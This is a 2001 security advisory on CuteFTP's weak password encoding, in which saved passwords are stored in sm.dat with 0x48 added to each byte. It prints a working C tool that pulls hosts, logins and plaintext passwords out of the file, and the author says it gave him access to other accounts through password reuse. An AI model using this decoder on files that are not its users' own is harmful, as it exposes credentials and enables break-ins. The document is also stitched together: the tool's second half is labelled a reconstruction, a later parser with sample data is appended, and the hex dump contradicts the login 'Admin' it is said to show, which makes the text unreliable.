============================================================================
Securax-SA-21                    Security Advisory
belgian.networking.security                                            Dutch
============================================================================

Topic:      CuteFTP uses a weak password encoding scheme
Announced:  2001-08-01
Affects:    CuteFTP 4.2.4 and below. (but not too low)

============================================================================

Note: If you happen to find more information, solutions, ... about the
below problem or further variants please contact me on the following
email incubus@securax.org, or you can contact the Securax crew by e-mail
at info@securax.org.

I. Problem Description
-----------------------

Globalscape's CuteFTP is a popular FTP client. It is used to connect to
remote ftp servers. CuteFTP has a kinda "Address book" which stores info
on several FTP servers, such as hostname, login & password (basically the
stuff you need to log in.. :)).

In any case, CuteFTP uses a very weak encryption scheme: it adds 72
(hex 48) to each byte of the plaintext password. So, Globalscape uses a
kinda ROT-72 encryption scheme.

Let's get down and dirty, technical that is.. How are the passwords
stored? Well, they are stored in a file called "sm.dat". I'll give you an
example. This is a part of the hex dump of my sm.dat:

08 31 30 2E 30 2E 30 2E 33 05 41 64 6D 6D 69 05 BC AD BB BB A9
^  |-hostname (10.0.0.3)-| ^  |--- login --| ^  |-encoded pw-|
|                          |                |
|__ len(hostname)          |__ len(login)   |__ len(password)

The password is BC AD BB BB A9, but if you subtract 48 (hex) from each
character, you'll see: 74 65 73 73 61, which is "tessa". So you probably
can see there is a user "Admin", with a password ("tessa") on box
10.0.0.3. Cute(ftp) isn't it?

II. Impact
----------

No, you won't be able to r3wt th3 pl4n3t with this, but it gave me access
to several other accounts, because ftp and shell passwords are often the
same.

But instead of letting you calculate the password..
here's the code:

--| BOF: cuteftpd.c |--

```c
/* CuteFTPd: a CUTE Fucking Too easy Password Decrypter
   ----------------------------------------------------
   This code was made on a hot and sunny afternoon, (as we got many
   of em in belgium). So, don't shoot me if some things won't work.
   I've found some problems when your login is 11 (0x0A) or 13 (0x0D)
   chars long... but what the hell.. fix it.

   This program is dedicated to Peter "DC" De Coninck, a good friend
   of mine who passed away in April. DC, I miss you, thank you for
   everything, take care man.

   All my love to Tessa, I love you forever, always, every day of my
   life, please marry me. I love you, i need you. please, be mine forever.

   Respect to all the great ppl at #securax@irc.hexyn.be: U know who
   i mean, and who i don't mean. grmBL. ;)

   To Reggie: happy birthday!! =)

   Take care,
   incubus

   ps: this code sucks, i know. */

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

#define banner "\n-] CuteFTP password retrieval tool\n -------------------------------\n\n"
#define usage  " usage: %s \n\n"

int main(int argc, char **argv)
{
    FILE *list;
    unsigned char c, p, t;
    unsigned char host[128], un[128], ep[128], dp[128];
    int i = 0;

    printf(banner);
    if (argc < 2) {
        printf(usage, argv[0]);
        exit(1);
    }
    if ((list = fopen(argv[1], "rb")) == NULL) {
        perror("error opening file");
        exit(1);
    }
    while (!feof(list)) {
        c = fgetc(list);
        if (c < 48) {                /* a small byte is taken to be a length prefix */
            i++;
            p = fgetc(list);
            if ((islower(p)) || (isupper(p)) || (isdigit(p))) {
                host[0] = p;
                /* The listing in the advisory is truncated at the loop below; the
                   rest follows the record layout described above (len+host,
                   len+login, len+password) and is a reconstruction, not the
                   original author's lines. */
                for (i = 1; i < c && i < 127; i++)
                    host[i] = fgetc(list);
                host[i] = '\0';
                t = fgetc(list);                          /* len(login) */
                for (i = 0; i < t && i < 127; i++)
                    un[i] = fgetc(list);
                un[i] = '\0';
                t = fgetc(list);                          /* len(password) */
                for (i = 0; i < t && i < 127; i++) {
                    ep[i] = fgetc(list);
                    dp[i] = ep[i] - 72;                   /* undo the +0x48 */
                }
                ep[i] = dp[i] = '\0';
                printf("host: %s\tlogin: %s\tpassword: %s\n", host, un, dp);
            }
        }
    }
    fclose(list);
    return 0;
}
```
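As an added example, not the advisory's own tool: a small C parser for the sm.dat record layout described above (length-prefixed host, login and password) that undoes the fixed +0x48 offset and refuses a record whose length prefixes run past the end of the data, which is exactly the "11 or 13 chars" class of trouble a length-driven reader has to guard against. The struct and function names are assumptions, and the sample bytes are constructed to match the advisory's dump (host 10.0.0.3, login Admin, password "tessa").

```c
#include <stdio.h>
#include <string.h>

#define ROT  0x48   /* CuteFTP adds 0x48 (72) to every password byte */
#define MAXF 128    /* field buffer; a length prefix is at most one byte */
struct entry { char host[MAXF]; char login[MAXF]; char pass[MAXF]; };

/* Copy one length-prefixed field from buf[*pos] into out, undoing the +0x48
   offset when decode is set. Returns 0 if the field would run past the end
   of buf or past out, so a truncated or damaged file is rejected, not read. */
static int take_field(const unsigned char *buf, size_t len, size_t *pos, char *out, int decode)
{
    if (*pos >= len) return 0;
    size_t n = buf[(*pos)++];
    if (n >= MAXF || n > len - *pos) return 0;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)(decode ? buf[*pos + i] - ROT : buf[*pos + i]);
    out[n] = '\0';
    *pos += n;
    return 1;
}

/* Parse host, login and password in the order the advisory's dump shows. */
int parse_entry(const unsigned char *buf, size_t len, size_t *pos, struct entry *e)
{
    return take_field(buf, len, pos, e->host, 0) &&
           take_field(buf, len, pos, e->login, 0) &&
           take_field(buf, len, pos, e->pass, 1);
}

/* Constructed sample record (not a real sm.dat): host "10.0.0.3",
   login "Admin", password "tessa" stored as BC AD BB BB A9. */
static const unsigned char sample[] = {
    0x08, '1', '0', '.', '0', '.', '0', '.', '3',
    0x05, 'A', 'd', 'm', 'i', 'n',
    0x05, 0xBC, 0xAD, 0xBB, 0xBB, 0xA9
};

int decode_sample(struct entry *e)
{
    size_t pos = 0;
    return parse_entry(sample, sizeof sample, &pos, e);
}

int main(void)
{
    struct entry e;
    if (decode_sample(&e))
        printf("host=%s login=%s password=%s\n", e.host, e.login, e.pass);
    return 0;
}
```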